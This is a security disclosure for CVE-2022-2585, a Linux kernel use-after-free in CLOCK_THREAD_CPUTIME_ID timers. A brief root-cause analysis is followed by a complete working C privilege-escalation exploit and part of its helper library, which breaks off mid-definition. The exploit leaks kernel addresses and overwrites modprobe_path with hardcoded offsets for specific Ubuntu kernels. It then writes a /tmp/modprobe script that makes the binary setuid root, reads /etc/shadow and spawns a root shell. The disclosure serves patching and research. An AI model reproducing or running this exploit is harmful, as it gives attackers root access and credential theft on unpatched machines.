TL;DR
A vulnerability in the way Linux handles the CLOCK_THREAD_CPUTIME_ID allows local attackers to reach a race condition and use this to elevate their privileges to root.
Vulnerability Summary
A race condition in the way CLOCK_THREAD_CPUTIME_ID
works allows local users to double free a pointer allowing them control over the outcome of the second free call and to utilise it to elevate their privileges to root.
Credit
An independent security researcher has reported this to the SSD Secure Disclosure program during the TyphoonPWN 2022 event.
CVE
CVE-2022-2585
Vendor Response
The Linux Kernel team has released a patch to address this vulnerability: https://seclists.org/oss-sec/2022/q3/116
Vulnerability Analysis
The CLOCK_THREAD_CPUTIME_ID bug lies in the posix CPU timer component of Linux kernel.
A CLOCK_THREAD_CPUTIME_ID timer is used for measuring the amount of CPU time consumed by A thread. Once timer_settime
is called on this timer, the timer will be “armed”.
Then, the timer will be triggered (by sending the program a signal) after the thread spending a user-specified time interval. This feature is useful if the program want to do something after consuming a specific amount of CPU time in the specific thread.
The way Linux kernel implements this feature is by linking the timer-associated struct k_itimer
data structure into a doubly-linked list in struct posix_cputimers
. Every time a timer interrupt is raised, a call chain like: check_thread_timers->collect_posix_cputimers->collect_timerqueue
will be invoked.
It will check whether the thread has consumed enough time: if yes, the timer will “expire” (triggered) and will be added into a firing
linked list. Then, all the timers in the firing linked list will be used, triggering posix_timer_event
, which will eventually send signals to the program.
Currently, in the Linux kernel, when a thread creates a thread cpu timer and then calls execve
, it will try to clean up all the timers on behalf of the process using exit_itimers(me->signal);
. This will free all the timers associated with the process in memory. However, it forgets to clean up the references in struct posix_cputimers
.
In other words, if the timer is already armed before execve
, the kernel will free the timer mechanism while maintaining a reference to it in the doubly linked timer list. When the time arrives, the kernel will walk through the linked list, find the timer, add it to the `firing` linked list, and try to trigger the timer, which causes a use-after-free situation.
Exploit
define _GNU_SOURCE #include <endian.h> #include <errno.h> #include <pthread.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <sys/mman.h> #include <time.h> #include <fcntl.h> #include <unistd.h> #include <assert.h> #include <poll.h> #include <sys/ioctl.h> #include <sys/resource.h> #include <sys/msg.h> #include <net/if.h> #include <netinet/ip.h> #include <sys/wait.h> #include <sys/shm.h> #include <sys/utsname.h> #include "libexp.h" #define SPRAY_NUM1 100 #define SPRAY_NUM2 350 #define SPRAY_NUM3 200 #define PIPE_SPRAY_NUM 0x600 #define M_TS_LEN 0x1000 #define LEAK_SPRAY_NUM 0x1000 #define SHM_SPRAY_NUM 0x400 #define PAGE_SPRAY_NUM 0x100 #define def_kbase 0xffffffff81000000 struct config { char *release; u64 init_ipc_ns; u64 modprobe_path; }; struct config configs[] = { { .release = "5.15.0-37-generic", .init_ipc_ns = 0xffffffff830824c0, .modprobe_path = 0xffffffff82e8b560 }, { .release = "5.15.0-39-generic", .init_ipc_ns = 0xffffffff83082580, .modprobe_path = 0xffffffff82e8b620 }, { .release = "5.15.0-40-generic", .init_ipc_ns = 0xffffffff83082580, .modprobe_path = 0xffffffff82e8b620 } }; int fd = 0; int val = 0; int *stage = &val; int shm_fd = -1; int *shm_stage; timer_t timerids1[SPRAY_NUM1]; timer_t timerids2[SPRAY_NUM2]; timer_t timerids3[SPRAY_NUM3]; int pipe_fds[PIPE_SPRAY_NUM][2]; u64 kernel_base = 0; u64 kaslr_slide = 0; u64 kptr_vtable = 0; u64 uptr_vtable = 0; u64 msg_addr = 0; u64 kbuf_addr = 0; u64 ubuf_addr = 0; char path[0x800]; u64 CPUID = 0; u64 page_size = 0x1000; char cpuid_env[0x20]; u64 init_ipc_ns = 0; u64 modprobe_path = 0; void *trigger_free(void *env_str) { timer_t timerid; int ret = timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &timerid); assert(ret == 0); *stage = 1; while(*stage != 2); struct timespec tspec = {.tv_sec = 3, .tv_nsec = 0}; struct itimerspec ispec = { .it_interval = tspec, .it_value = tspec}; timer_settime(timerid, 0, &ispec, NULL); // getchar(); // fd = memfd_create("exp", 0); // assert(fd >= 0); char *argv[] = {path, NULL}; char *env[] = {env_str, cpuid_env, NULL}; execve(path, argv, env); return NULL; } void spray_timer(timer_t *tids, u32 num) { for(int i=0; i<num; i++) timer_create(CLOCK_THREAD_CPUTIME_ID, NULL, &tids[i]); } void release_timer(timer_t *tids, u32 num, u32 jump) { for(int i=0; i<num; i+=jump) timer_delete(tids[i]); } void leak_func() { pthread_t tid; ts_fence(); spray_timer(timerids1, SPRAY_NUM1); pthread_create(&tid, NULL, trigger_free, (void *)"LEAK=1"); while(*stage != 1); spray_timer(timerids2, SPRAY_NUM2); spray_timer(timerids3, SPRAY_NUM3); release_timer(timerids1, SPRAY_NUM1, 1); release_timer(timerids2, SPRAY_NUM2, 1); release_timer(timerids3, SPRAY_NUM3, 2); //puts("Done"); //int c = getchar(); //printf("c : %#xn", c); //defragment(0x100, 0x1000); usleep(100*1000); *stage = 2; while(1); } void exp_func() { pthread_t tid; ts_fence(); spray_timer(timerids1, SPRAY_NUM1); pthread_create(&tid, NULL, trigger_free, (void *)"EXP=1"); while(*stage != 1); spray_timer(timerids2, SPRAY_NUM2); spray_timer(timerids3, SPRAY_NUM3); release_timer(timerids1, SPRAY_NUM1, 1); release_timer(timerids2, SPRAY_NUM2, 1); release_timer(timerids3, SPRAY_NUM3, 2); usleep(100*1000); *stage = 2; while(1); } void leak_child_func() { usleep(1000*100); // tell the parent process that the slab page is freed *shm_stage = 1; // wait for the parent process to reclaim the page while(*shm_stage != 2); // trigger unlink by exiting the process (in fact, the unlink happens in wait) puts("[!] Now trigger unlink in the child process!"); exit(0); } void exp_child_func() { usleep(1000*100); // tell the parent process that the slab page is freed *shm_stage = 1; // cannot sleep here or the timer will not be invoked // to avoid waiting CPU time (and increase the critical window), let's move it to another CPU set_cpu(CPUID); while(1); } int search_msgqid() { int msgqid; struct msqid_ds ds; struct msginfo msginfo; int maxind = msgctl(0, MSG_INFO, (struct msqid_ds *) &msginfo); assert(maxind >= 0); char buffer[0x2000]; int target_msgqid = -1; // printf("check %d msgsn", maxind); for(int i=0; i<maxind; i++) { int ret; msgqid = msgctl(i, MSG_STAT, &ds); assert(msgqid >= 0); for(int j=0; j<ds.msg_qnum; j++) { ret = msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY); assert(ret >= 0); if(ret >= 0x1000 && !memcmp(buffer, "AAAAAAAA", 8)) { target_msgqid = msgqid; // hex_print(buffer, 0x100); break; } msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT); if(j == ds.msg_qnum-1) { int ret = msgctl(msgqid, IPC_RMID, 0); assert(ret == 0); } } } return target_msgqid; } void increase_limit() { int ret; struct rlimit open_file_limit; /* Query current soft/hard value */ ret = getrlimit(RLIMIT_NOFILE, &open_file_limit); assert(ret >= 0); /* Set soft limit to hard limit */ open_file_limit.rlim_cur = open_file_limit.rlim_max; ret = setrlimit(RLIMIT_NOFILE, &open_file_limit); assert(ret >= 0); } u64 leak_kbuf_addr() { timer_t defrag_timers[0x400]; spray_timer(defrag_timers, 0x400); // trigger UAF first if(!fork()) { set_cpu(CPUID); leak_func(); // this function will call execve, so no return while(1); } // wait for the slab page to be freed while(*shm_stage != 1); // do page spray void *addr = umem_alloc(NULL, page_size); int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM); *shm_stage = 2; // wait for the unlink to happen wait(NULL); // now we should have the heap leak! void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0); assert((u64)addr2 != -1); u64 heap_addr = 0; int idx = 0; while(!heap_addr && idx < 0x10*100) { u64 *obj_ptr = (u64 *)(addr2 + idx*0x100); if(obj_ptr[15] != 0) { heap_addr = obj_ptr[15] - 0x78; ubuf_addr = (u64)(obj_ptr) & 0xfffffffffffff000; break; } idx += 1; } if(!heap_addr) { puts("[-] leak kbuf_addr failed (but it's OK)"); // clean up munmap(addr2, page_size*PAGE_SPRAY_NUM); close(s); return 0; } return heap_addr & 0xfffffffffffff000; } u64 leak_msg_addr() { int msgqids[LEAK_SPRAY_NUM]; // allocate msgq first, it is also in kmalloc-256 for(int i=0; i<LEAK_SPRAY_NUM; i++) { msgqids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); } char buf[0xd0]; memset(buf, 0, sizeof(buf)); memset(&buf[0xb0], 'A', 0x20); memset(buf, 'A', 8); timer_t defrag_timers[0x100]; spray_timer(defrag_timers, 0x100); // trigger UAF first if(!fork()) { set_cpu(CPUID); leak_func(); // this function will call execve, so no return while(1); } // wait for the slab page to be freed while(*shm_stage != 1); // do page spray void *addr = umem_alloc(NULL, page_size); int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM); *shm_stage = 2; // wait for the unlink to happen wait(NULL); // now we should have the heap leak! void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0); assert((u64)addr2 != -1); u64 heap_addr = 0; int idx = 0; while(!heap_addr && idx < page_size*PAGE_SPRAY_NUM/0x100) { u64 *obj_ptr = (u64 *)(addr2 + idx*0x100); if(obj_ptr[15] != 0) { heap_addr = obj_ptr[15] - 0x78; break; } idx += 1; } if(!heap_addr) { puts("[-] leak msg_addr failed (but it's OK)"); // clean up munmap(addr2, page_size*PAGE_SPRAY_NUM); close(s); return 0; } // now try to free the page! munmap(addr2, page_size*PAGE_SPRAY_NUM); close(s); for(int i=0; i<LEAK_SPRAY_NUM; i++) { for(int j=0; j<4; j++) msgsnd(msgqids[i], buf, sizeof(buf)-8, IPC_NOWAIT); } return (heap_addr&0xfffffffffffff000) + 0x100; } void get_root() { set_cpu(CPUID+1); int fd = open("/proc/sys/kernel/modprobe", 0); char buf[0x100]; while(1) { lseek(fd, 0, SEEK_SET); read(fd, buf, sizeof(buf)); if(!strncmp(buf, "//tmp/modprobe", 14)) break; sleep(1); } puts("[+] Payload is written! /proc/sys/kernel/modprobe now points to /tmp/modprobe!"); system("echo 1 > /tmp/1; chmod +x /tmp/1; /tmp/1 2> /dev/null"); char *argv[] = {path, NULL}; char *env[] = {cpuid_env, NULL}; execve(path, argv, env); } void context_setup() { // handle CPUID char *id_str = getenv("CPUID"); if(id_str) CPUID = atoi(id_str); else CPUID = cpu_num - 2; int ret = sprintf(cpuid_env, "CPUID=%lld", CPUID); assert(ret > 0); // handle page_size if(cpu_num >= 8) page_size = 0x2000; else page_size = 0x1000; } void prep_shm() { shm_fd = open("/tmp/shm", O_RDWR|O_CREAT, 0666); ftruncate(shm_fd, 4); shm_stage = (int *)mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, shm_fd, 0); *shm_stage = 0; } void check_root() { // if we are root if(open("/etc/shadow", 0) >= 0) { setuid(0); system("head -n 10 /etc/shadow"); system("/bin/bash"); exit(0); } // or if we can be root int tmp_fd = open("/proc/sys/kernel/modprobe", 0); char buf[0x2000]; memset(buf, 0, sizeof(buf)); read(tmp_fd, buf, sizeof(buf)); if(!strncmp(buf, "//tmp/modprobe", 14)) { sprintf(buf, "echo '#!/bin/bashnchown root:root %s; chmod 04755 %s' > /tmp/modprobe; chmod +x /tmp/modprobe", path, path); system(buf); system("echo 1 > /tmp/1; chmod +x /tmp/1; /tmp/1 2> /dev/null"); char *argv[] = {path, NULL}; char *env[] = {cpuid_env, NULL}; execve(path, argv, env); } } void setup_offsets(char *release) { for(int i=0; i<sizeof(configs)/sizeof(configs[0]); i++) { if(!strcmp(configs[i].release, release)) { init_ipc_ns = configs[i].init_ipc_ns; modprobe_path = configs[i].modprobe_path; break; } } assert(init_ipc_ns != 0); assert(modprobe_path != 0); } int main(int argc, char **argv) { context_setup(); set_cpu(CPUID); increase_limit(); // save absolute path for later use if(argc && argv[0] && argv[0][0]) assert(realpath(argv[0], path) != NULL); // trigger the UAF timer when trying to leak heap address if(getenv("LEAK")) { set_cpu(CPUID); prep_shm(); leak_child_func(); exit(0); } // trigger the UAF timer when trying to perform exploitation if(getenv("EXP")) { set_cpu(CPUID); prep_shm(); exp_child_func(); exit(0); } // in case we already are/can be root check_root(); // first thing first, before we get into a namespace // we launch a process that wait for root if(!clean_fork()) { get_root(); sleep(10000); } struct utsname uname_buf; assert(uname(&uname_buf) == 0); printf("CPUID: %lldn", CPUID); printf("page_size: %#llxn", page_size); printf("release: %sn", uname_buf.release); setup_offsets((char *)&uname_buf.release); prep_shm(); setup_sandbox(); setup_pg_vec(); // step 1: leak kbuf_addr puts("[*] try to leak kernel buffer addr"); while(!kbuf_addr) { cleanup_msgs(); usleep(100000); kbuf_addr = leak_kbuf_addr(); } printf("[+] kbuf_addr: %#llxn", kbuf_addr); printf("[+] ubuf_addr: %#llxn", ubuf_addr); assert(kbuf_addr != 0); assert(ubuf_addr != 0); *(u64 *)ubuf_addr = 0x4141414141414141; // reset shm_stage for orchestration *shm_stage = 0; // step 2: leak msg_msg addr puts("[*] try to leak msg_msg addr"); while(!msg_addr) { cleanup_msgs(); usleep(100000); msg_addr = leak_msg_addr(); } printf("[+] msg_msg addr: %#llxn", msg_addr); assert(msg_addr != 0); // reset shm_stage for orchestration *shm_stage = 0; // step 2: trigger the vulnerability again and reclaim the page // trigger UAF if(!fork()) { set_cpu(CPUID); exp_func(); // this function will call execve, so no return while(1); } // wait for the slab page to be freed while(*shm_stage != 1); // do page spray, the payload is used for trapping CPU0 to an infinite loop so we can // later modify the memory in CPU1 void *addr = umem_alloc(NULL, page_size); *(u64 *)(ubuf_addr+0x130) = kbuf_addr+0x120; for(int i=0; i<page_size/0x100; i++) { u64 *obj_ptr = (u64 *)(addr-0x40+-2+i*0x100); obj_ptr[10] = M_TS_LEN; // timer->it_requeue_pending obj_ptr[11] = 0x000000012a05f200; obj_ptr[14] = msg_addr-0x20; // timer->sigq obj_ptr[16] = kbuf_addr + 0x120; obj_ptr[17] = kbuf_addr + 0x100; obj_ptr[18] = 0x000000012a061742; obj_ptr[19] = kbuf_addr; // head } int s = pg_vec_spray(addr, page_size, PAGE_SPRAY_NUM); *shm_stage = 2; // now, wait for the timer to get triggered. // when it is triggered, timer->firing will become 1, then we know where is the timer // in the buffer and the CPU0 is halted set_cpu(CPUID+1); // switch to CPU1 because CPU0 will hang void *addr2 = mmap(NULL, page_size*PAGE_SPRAY_NUM, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0); u64 *timer_ptr = NULL; while(!timer_ptr) { int idx = 0; while(idx < page_size*PAGE_SPRAY_NUM/0x100) { u64 *obj_ptr = (u64 *)(addr2 + idx*0x100); // if(idx % 0x10==0)printf("a: %pn", obj_ptr); if(obj_ptr[23] == 1) {// tmr.firing == 1 timer_ptr = obj_ptr; break; } idx++; } } // now we know tmr->firing is set, CPU0 is going to be trapped very soon // let's waste a few cycles to ensure that read(-1, NULL, 0); // now we are sure CPU0 is trapped => // 1. clear out the timer's first part to avoid locking issues // 2. modify the timer so it won't be added to the firing list again immediately, but will be triggered in 2 seconds // 3. release CPU0 by making it think it reaches a leaf node memset(timer_ptr, 0, 0x50); timer_ptr[18] = 0x000000012a061742*2; *(u64 *)(ubuf_addr + 0x130) = 0; // now we are back to CPU0! so we spray in the per-CPU cache! set_cpu(CPUID); printf("[+] timer_ptr: %pn", timer_ptr); // at this moment, we have a msg_msg with an enlarged m_ts, let's find it! puts("[*] Looking for the victim msg_msg..."); int msgqid = search_msgqid(); assert(msgqid >= 0); printf("[+] Found it! msgqid: %dn", msgqid); // alright, let's spray tons of shmid to leak kaslr int shmids[SHM_SPRAY_NUM]; char buffer[0x2000]; memset(buffer, 0, sizeof(buffer)); for(int i=0; i<SHM_SPRAY_NUM; i++) shmids[i] = shmget(IPC_PRIVATE, 1, 0600); int ret = msgrcv(msgqid, buffer, sizeof(buffer), 0, MSG_NOERROR | IPC_NOWAIT | MSG_COPY); assert(ret >= 0); // search for shmid, we can't be unluckly enough that there is no shmid_kernel in the PAGE? for(int i=0; i<(page_size/0x100)-2; i++) { u64 *obj_ptr = (u64 *)(buffer + 0xd0 + i*0x100); u64 val = obj_ptr[29]; // shmid_kernel->ns, should be init_ipc_ns if(((val-init_ipc_ns) & 0xfff) == 0) { kaslr_slide = val - init_ipc_ns; kernel_base = kaslr_slide + def_kbase; break; } } printf("[+] kernel_base: %#llxn", kernel_base); printf("[+] kaslr_slide: %#llxn", kaslr_slide); if(kernel_base == 0) { hex_print(buffer, sizeof(buffer)); timer_ptr[18] = 0xffffffffffff;// disarm timer to avoid crash getchar(); exit(0); } assert(kernel_base != 0); // now we have KASLR leak and the timer will be triggered again in a few seconds // let's prepare the timer *(u64 *)(ubuf_addr+0x130) = kbuf_addr+0x120; timer_ptr[10] = 0x706d742f-1; // timer->it_requeue_pending => /tmp timer_ptr[11] = 0x000000012a05f200; timer_ptr[14] = kaslr_slide + modprobe_path - 0x38 + 1; // overwrirte modprobe_path+1 with /tmp => /sbin/modprobe becomes //tmp/modprobe timer_ptr[15] = 0; timer_ptr[16] = kbuf_addr + 0x120; timer_ptr[17] = kbuf_addr + 0x100; timer_ptr[18] = 0x000000012a061742*2; timer_ptr[19] = kbuf_addr; // head // switch to CPU1 again because we know CPU0 will be trapped again in a few seconds set_cpu(CPUID+1); // now wait CPU0 to get trapped timer_ptr[23] = 0; // tmr->firing = 0 while(!timer_ptr[23]); // wait for firing to be set read(-1, NULL, 0); // waste a few cycles to ensure CPU0 is trapped // 1. make sure the timer will not be triggered again by setting a huge expire value // 2. resume its execution, write a heap pointer before modprobe_path so that send_sigqueue will not panic timer_ptr[18] = 0xffffffffffff; *(u64 *)(ubuf_addr + 0x130) = kaslr_slide + modprobe_path - 0x30 - 6; // prepare payload puts("[*] Waiting for payload to be written into '/proc/sys/kernel/modprobe'..."); sprintf(buffer, "echo '#!/bin/bashnchown root:root %s; chmod 04755 %s' > /tmp/modprobe; chmod +x /tmp/modprobe", path, path); system(buffer); // now wait for the get_root subprocess to wake up and launch a root shell wait(NULL); return 0; }
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <stdarg.h> #include <sched.h> #include <time.h> #include <poll.h> #include <signal.h> #include <keyutils.h> #include <pthread.h> #include <errno.h> #include <sys/types.h> #include <sys/ipc.h> #include <sys/msg.h> #include <sys/mman.h> #include <sys/prctl.h> #include <sys/ioctl.h> #include <sys/socket.h> #include <sys/syscall.h> #include <linux/userfaultfd.h> #include <arpa/inet.h> #include <x86intrin.h> #include <linux/if_packet.h> #include <net/ethernet.h> #include <net/if.h> #include <netinet/ip.h> #include "libexp.h" struct fault_struct { int uffd; struct fault_struct *next; void *addr; size_t len; void *src_page; void (*hook)(void *); }; static u64 min_cpu_freq; static u64 min_granularity; static u64 min_slice_tsc; static u64 msgmnb; static u64 mem_size; static u64 optmem_max; static int urand_fd; u64 cpu_num; struct cpu_info *idle_cpus; cpu_set_t cpu_mask; size_t kmalloc_size_array[13] = {0x8, 0x10, 0x20, 0x40, 0x60, 0x80, 0xc0, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000}; #define DEBUG 0 #define dprintf(...) if(DEBUG) printf(__VA_ARGS__) #define PAGE_SHIFT 12 #define PAGE_SIZE (1 << PAGE_SHIFT) #define PFN_MIN 0 #define CPU_FREQ_FILE "/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_min_freq" #define SCHED_GRAN_FILE "/proc/sys/kernel/sched_min_granularity_ns" #define MSGMNB_FILE "/proc/sys/kernel/msgmnb" #define CPU_INFO_FILE "/proc/cpuinfo" #define MEM_INFO_FILE "/proc/meminfo" #define OPTMEM_MAX_FILE "/proc/sys/net/core/optmem_max" #define SCHED_DEBUG_FILE "/proc/sched_debug" #define SUPPRESS_PROC_NUM 20 #define UNIV_SPRAY_FILE "/tmp/univ_spray_dummy" void rand_str(char *dest, size_t length) { char charset[] = "0123456789" "abcdefghijklmnopqrstuvwxyz" "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; read(urand_fd, dest, length); for(int i=0; i<length; i++) { int idx = ((int)dest[i]) % (sizeof(charset)/sizeof(char) - 1); dest[i] = charset[idx]; } dest[length] = ' '; } void hex_print(void *addr, size_t len) { u64 tmp_addr = (u64)addr; puts(""); for(u64 tmp_addr=(u64)addr; tmp_addr < (u64)addr + len; tmp_addr += 0x10) { printf("0x%016llx: 0x%016llx 0x%016llxn", tmp_addr, *(u64 *)tmp_addr, *(u64 *)(tmp_addr+8)); } } void error_out(const char *fmt, ...) { char *buf; va_list ap; va_start(ap, fmt); if(vasprintf(&buf, fmt, ap) < 0) { perror("[error_out]"); exit(-1); } va_end(ap); puts(buf); perror("[Reason] "); exit(-1); } static u64 _read_u64_from_file(const char *fname) { FILE *f = fopen(fname, "r"); long size = 0x100; char *buf = alloca(size+1); // read content if(f == NULL) error_out("fail to open %s", fname); if(fread(buf, 1, size, f) <= 0) error_out("fail to fread on %s", fname); buf[size] = 0; fclose(f); return atoll(buf); } static size_t kmalloc_size(size_t num) { for(int i=0; i<sizeof(kmalloc_size_array)/sizeof(kmalloc_size_array[0]); i++) { size_t size = kmalloc_size_array[i]; if(size > num) return size; } error_out("%ld is too large to fit in kmalloc", num); } static u64 _get_cpu_freq(void) { // try to read from u64 first if(access(CPU_FREQ_FILE, R_OK) == 0) return _read_u64_from_file(CPU_FREQ_FILE); // try to read from /proc/cpuinfo if(access(CPU_INFO_FILE, R_OK) == 0) { FILE *f = fopen(CPU_INFO_FILE, "r"); char *line_buf = NULL; char *freq_buf; size_t n; // look for cpu MHz while(!feof(f)) { if(getline(&line_buf, &n, f) < 0) { free(line_buf); goto out; } if(strstr(line_buf, "cpu MHz")) break; } freq_buf = strstr(line_buf, ":"); freq_buf += 1; double freq = atof(freq_buf) * 1000;// MHz to KHz return (u64)freq; } out: error_out("fail to get cpu frequency"); return -1; } static u64 _get_min_gran(void) { // try to read from file first if(access(SCHED_GRAN_FILE, R_OK) == 0) return _read_u64_from_file(SCHED_GRAN_FILE); // return a commonly used default value return 3000000; } static u64 _get_cpu_num(void) { return sysconf(_SC_NPROCESSORS_ONLN); } static u64 _get_mem_size(void) { FILE *f = fopen(MEM_INFO_FILE, "r"); char *line_buf = NULL; char *buf; size_t n; if(unlikely(f == NULL)) error_out("fail to open /proc/meminfo"); if(getline(&line_buf, &n, f) < 0) { free(line_buf); goto out; } buf = strstr(line_buf, ":") + 1; fclose(f); return atoll(buf) * 1024; out: error_out("fail to read memory size"); fclose(f); return -1; } static void busy_loop(void) { while(1); } pid_t clean_fork(void) { pid_t pid = fork(); if(pid) return pid; if(prctl(PR_SET_PDEATHSIG, SIGKILL) < 0) error_out("fail to register DEATHSIG"); return pid; } void anti_swapper(void (*hook)(void)) { for(int i=0; i<cpu_num; i++) { if(!clean_fork()) { set_cpu(i); if(hook) hook(); busy_loop(); } } } void suppress_int(void (*hook)(void)) { for(int i=0; i<cpu_num; i++) { // for each core spawn SUPPRESS_PROC_NUM dummy process for(int j=0; j<SUPPRESS_PROC_NUM; j++) { if(!clean_fork()) { set_cpu(i); if(hook) hook(); busy_loop(); } } } } void ts_fence(void) { cpu_set_t my_set; // Step1: get current affinity mask if(sched_getaffinity(0, sizeof(my_set), &my_set)) error_out("fail to get cpu affinity"); // Step2: pin CPU to current CPU to avoid task migration and get wrong tsc set_cpu(sched_getcpu()); // Step3: do context switch detection register u64 start = __rdtsc(); register u64 prev = start; register u64 now = start; while(1) { now = __rdtsc(); if(unlikely(now - prev > min_slice_tsc)) break; if(unlikely(now - start > 5*min_slice_tsc)) { // puts("[Info] Have been waiting for a reschedule for too long, gonna yield and hope next time we get a new time slice"); sched_yield(); break; } prev = now; } // Step4: restore affinity mask if(sched_setaffinity(0, sizeof(my_set), &my_set)) error_out("fail to set cpu affinity"); } void set_cpu(int cpuid) { cpu_set_t my_set; CPU_ZERO(&my_set); CPU_SET(cpuid, &my_set); if(sched_setaffinity(0, sizeof(my_set), &my_set) != 0) error_out("set cpu affinity at cpu: %d fails", cpuid); } void unset_cpu(void) { if(unlikely(sched_setaffinity(0, sizeof(cpu_set_t), &cpu_mask) != 0)) error_out("fail to unset cpu affinity"); } int write_file(const char* fname, const char* fmt, ...) { char buf[1024]; va_list args; va_start(args, fmt); vsnprintf(buf, sizeof(buf)-1, fmt, args); va_end(args); buf[sizeof(buf)-1] = 0; int len = strlen(buf); int fd = open(fname, O_WRONLY | O_CLOEXEC); if (fd == -1) return -1; if (write(fd, buf, len) != len) { close(fd); return -1; } close(fd); return 0; } void setup_sandbox(void) { int real_uid = getuid(); int real_gid = getgid(); if (unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS) != 0) error_out("unshare fails"); if (write_file("/proc/self/setgroups", "deny") < 0) error_out("write_file(/proc/self/set_groups) fails"); if (write_file("/proc/self/uid_map", "0 %d 1n", real_uid) < 0) error_out("write_file(/proc/self/uid_map) fails"); if (write_file("/proc/self/gid_map", "0 %d 1n", real_gid) < 0) error_out("write_file(/proc/self/gid_map) fails"); } void *umem_alloc(void *addr, size_t size) { void *ret; int flags = MAP_SHARED | MAP_ANON; if (addr) flags |= MAP_FIXED; ret = mmap(addr, size, PROT_READ | PROT_WRITE | PROT_EXEC, flags, -1, 0); if(addr && ret != addr) error_out("[-] umem_alloc fails to mmap the fixed address %p", addr); if(!addr && !ret) error_out("[-] umem_alloc fails to mmap NULL"); return ret; } /* use add_key for defragment * add_key will allocate 5 objects in one call when the key is added for the first time * and 4 objects afterwards * 1. strlen(desc) and get freed eventually * 2. plen caused by kvmalloc and get freed eventually * 3. (struct user_key_payload) + plen, sizeof(payload)+0x18 * 4. sizeof(struct assoc_array_edit) in size of 328 (0x148), and freed if not the first time * (5). sometimes allocate (struct assoc_array_node) twice 0x98/152 * 6. struct key, size of 0x100 -> through special cache not kmalloc * 7. sizeof(desc), caused by kmemdup */ // here we use the desc method void defragment_add_key(size_t size, u32 num) { char type[] = "user"; char *desc = alloca(size+1); char payload[1]; if(num > 195) puts("num too large, defragmentation is likely to fail"); memset(desc, 0, size+1); payload[0] = 'A'; for(int i=0; i<num; i++) { key_serial_t key; rand_str(desc, size-1); key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING); if(key < 0) error_out("add_key failed at idx %d", i); } } void add_key_spray_num(void *payload, size_t size, u32 num) { char type[] = "user"; char desc[0x10]; memset(desc, 0, sizeof(desc)); for(int i=0; i<num; i++) { key_serial_t key; rand_str(desc, sizeof(desc)-1); key = add_key(type, desc, payload, size, KEY_SPEC_THREAD_KEYRING); if(key < 0) error_out("add_key failed at idx %d", i); } } // max length: 4096 void add_key_desc_spray_num(char *desc, u32 num) { char type[] = "user"; size_t size = strlen(desc); size_t ksize = kmalloc_size(size); char payload[1]; if(num > 195) puts("num too large, defragmentation is likely to fail"); if(ksize <= size) error_out("size too large, it should be smaller than next kmalloc size"); if(unlikely(size) >= 4096) error_out("[-] max size of desc spray is 0x1000"); payload[0] = 'A'; for(int i=0; i<num; i++) { key_serial_t key; rand_str(&desc[size], ksize-size-1); key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING); if(key < 0) error_out("add_key failed at idx %d", i); } } static struct msg_spray_t *msg_spray_once(void *payload, size_t msg_size, u32 num) { int msgqid; char *buf; // create the message queue id first msgqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); if(unlikely(msgqid < 0)) error_out("fail to create a System V message queue"); // prepare msg buffer if(payload) buf = payload; else { buf = alloca(msg_size); memset(buf, 'A', msg_size); } // do spray for(int i=0; i<num; i++) { if(unlikely(msgsnd(msgqid, buf, msg_size, IPC_NOWAIT) < 0)) { error_out("msgsnd failed at idx %d", i); } } // return info about this spray struct msg_spray_t *spray = malloc(sizeof(struct msg_spray_t)); spray->next = NULL; spray->msgqid = msgqid; spray->payload = payload; spray->len = msg_size; spray->num = num; return spray; } struct msg_spray_t *msg_spray(void *payload, size_t msg_size, u32 num) { u32 max_num = msgmnb / (msg_size + 0x30); u32 sent = 0; struct msg_spray_t *spray = NULL, *tmp_spray; // do max number of allocation and then repeat for a new message queue while(num > 0) { u32 todo = (num >= max_num) ? max_num : num; tmp_spray = msg_spray_once(payload, msg_size, todo); sent += todo; num -= todo; // link tmp_spray if(!spray) spray = tmp_spray; else { tmp_spray->next = spray->next; spray->next = tmp_spray; } } return spray; } struct msg_spray_t *msg_spray_max(void *payload, size_t plen) { size_t size = plen + 0x30; u32 max_num = msgmnb / size; return msg_spray(payload, plen, max_num); } void msg_spray_clean(struct msg_spray_t *spray) { void *buffer = malloc(sizeof(struct msgbuf) + spray->len); while(spray) { //printf("spray->len: %dn", spray->len); //printf("spray->payload: %pn", spray->payload); //printf("spray->num: %dn", spray->num); //printf("spray->msgqid: %dn", spray->msgqid); //printf("spray->next: %pn", spray->next); for(int i=0; i<spray->num; i++) { if (msgrcv(spray->msgqid, buffer, spray->len, 0, MSG_NOERROR | IPC_NOWAIT) == -1) { if(errno != ENOMSG) error_out("[msg_spray_clean]"); } } if(msgctl(spray->msgqid, IPC_RMID, NULL)) error_out("fail to remove message queue"); spray = spray->next; } //puts("clean done"); } /* we don't want to spend extra time during defragmentation, so we should * allocate message queue ids ahead of time. * The difference shouldn't be too much though * each allocation takes about 3 microseconds * */ void defragment_msg(size_t size, u32 num) { // should be equivalent with the orignal message in terms of heap usage size = (size <= 0x30) ? 0x31 : size; size_t msg_size = size - 0x30; u32 max_num = msgmnb / size; u32 sent = 0; msg_spray(NULL, msg_size, num); } void defragment(size_t size, u32 num) { // we prefer msg_msg to do defragmentation because it does not // allocate extra objects if(size <= 0x20) defragment_add_key(size, num); else defragment_msg(size, num); } static void *fault_handling_thread(void *arg) { struct 